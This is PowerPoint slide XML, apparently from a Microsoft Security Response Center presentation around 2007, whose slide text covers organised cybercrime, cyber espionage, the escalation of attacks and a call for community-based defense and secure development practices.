        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3821113" y="2933700"/>
            <a:ext cx="1655762" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46084" name="Picture 16" descr="transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6677025" y="830263"/>
            <a:ext cx="2317750" cy="5689600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46085" name="Picture 68" descr="101016_finders"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7229475" y="1060450"/>
            <a:ext cx="1092200" cy="1198563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46086" name="Picture 70" descr="101016_malware"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7248525" y="3676650"/>
            <a:ext cx="1179513" cy="1092200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46087" name="Picture 71" descr="101016_attacker"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7221538" y="4956175"/>
            <a:ext cx="1119187" cy="1279525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46088" name="Picture 22" descr="101016_handyman"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7275513" y="2309813"/>
            <a:ext cx="1176337" cy="1203325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Connector 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4787900" y="1708151"/>
            <a:ext cx="2492375" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750" cmpd="sng">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rot="16200000" flipH="1">
            <a:off x="4803775" y="4186238"/>
            <a:ext cx="2547938" cy="1585912"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750" cmpd="sng">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6091" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="158750" y="1235075"/>
            <a:ext cx="8574088" cy="5778500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="398463" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Criminal Organizations now have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="796925" lvl="1" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Almost unlimited money &amp; resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="796925" lvl="1" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Longer term focus and multi year planning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="796925" lvl="1" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Mature Engineering Practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="796925" lvl="1" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="796925" lvl="1" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="796925" lvl="1" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="4000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="398463" indent="-398463" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Organizations also conduct “cyber espionage”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="796925" lvl="1" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Significant resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="796925" lvl="1" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Institutional Support and multi year planning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="796925" lvl="1" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Focus on specifics…right down to the individual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398463" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="398463" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9"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8643" y="353756"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>MSRC Evolution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1160463"/>
            <a:ext cx="8574088" cy="5127625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="398463" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Escalation of Attacks &amp; Intensity of Attacker Focus </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="915988" lvl="1" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Many different motivations </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="915988" lvl="1" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Many different origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398463" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Securing customers requires a new paradigm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="915988" lvl="1" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>New partnerships and strategies needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398463" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Microsoft to drive Community Based Defense</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="915988" lvl="1" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Extend MSRC Response Process and Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="915988" lvl="1" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>SDL &amp; Security Engineering for other ISVs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="915988" lvl="1" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Defense in Depth and Security Education critical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="915988" lvl="1" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398463" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="398463" indent="-398463" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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8"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Call To </a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Action – 2007</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 45"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="176213" y="5238750"/>
            <a:ext cx="8145462" cy="1762125"/>
            <a:chOff x="175484" y="5949229"/>
            <a:chExt cx="8146480" cy="1762125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13337" name="Picture 41" descr="cooltools-shape.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="187614" y="6286500"/>
              <a:ext cx="8134350" cy="1143000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13338" name="Picture 25" descr="C:\Program Files\Microsoft Resource DVD Artwork\DVD_ART\Artwork_Imagery\Shapes and Graphics\Glow\white oval shaped glow.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="175484" y="5949229"/>
              <a:ext cx="1511733" cy="1762125"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13339" name="Picture 5" descr="C:\Documents and Settings\mikez\Local Settings\Temporary Internet Files\Content.IE5\GTYBWD23\MCj04315940000[1].png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="547484" y="6455679"/>
              <a:ext cx="813339" cy="813339"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 48"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="176213" y="1020763"/>
            <a:ext cx="8134350" cy="1762125"/>
            <a:chOff x="127000" y="-210128"/>
            <a:chExt cx="8134350" cy="1762125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13334" name="Picture 29" descr="cooltools-shape.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="127000" y="127000"/>
              <a:ext cx="8134350" cy="1143000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13335" name="Picture 25" descr="C:\Program Files\Microsoft Resource DVD Artwork\DVD_ART\Artwork_Imagery\Shapes and Graphics\Glow\white oval shaped glow.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="191656" y="-210128"/>
              <a:ext cx="1511733" cy="1762125"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13336" name="Picture 21" descr="C:\Documents and Settings\mikez\Local Settings\Temporary Internet Files\Content.IE5\45Y78TE7\MCj02959630000[1].wmf"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="532741" y="332510"/>
              <a:ext cx="815768" cy="738401"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 47"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="92075" y="2120900"/>
            <a:ext cx="8224838" cy="1762125"/>
            <a:chOff x="55416" y="1496434"/>
            <a:chExt cx="8224407" cy="1762125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13331" name="Picture 30" descr="cooltools-shape.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="145473" y="1787525"/>
              <a:ext cx="8134350" cy="1143000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13332" name="Picture 25" descr="C:\Program Files\Microsoft Resource DVD Artwork\DVD_ART\Artwork_Imagery\Shapes and Graphics\Glow\white oval shaped glow.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="55416" y="1496434"/>
              <a:ext cx="1511733" cy="1762125"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13333" name="Picture 2" descr="C:\Program Files\Microsoft Resource DVD Artwork\DVD_ART\Artwork_Imagery\Shapes and Graphics\communication towers satellites\radio tower 3.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="587983" y="1945567"/>
              <a:ext cx="483894" cy="806870"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 46"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="176213" y="3082925"/>
            <a:ext cx="8145462" cy="1762125"/>
            <a:chOff x="175484" y="2798760"/>
            <a:chExt cx="8146480" cy="1762125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13328" name="Picture 31" descr="cooltools-shape.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="187614" y="3184236"/>
              <a:ext cx="8134350" cy="1143000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13329" name="Picture 25" descr="C:\Program Files\Microsoft Resource DVD Artwork\DVD_ART\Artwork_Imagery\Shapes and Graphics\Glow\white oval shaped glow.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="175484" y="2798760"/>
              <a:ext cx="1511733" cy="1762125"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13330" name="Picture 4" descr="C:\Documents and Settings\mikez\Local Settings\Temporary Internet Files\Content.IE5\BYSNND8D\MCj04315780000[1].png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="499919" y="3223491"/>
              <a:ext cx="1032208" cy="1039090"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 43"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="184150" y="4183063"/>
            <a:ext cx="8134350" cy="1762125"/>
            <a:chOff x="187614" y="4695824"/>
            <a:chExt cx="8134350" cy="1762125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13325" name="Picture 38" descr="cooltools-shape.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="187614" y="5031509"/>
              <a:ext cx="8134350" cy="1143000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13326" name="Picture 25" descr="C:\Program Files\Microsoft Resource DVD Artwork\DVD_ART\Artwork_Imagery\Shapes and Graphics\Glow\white oval shaped glow.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
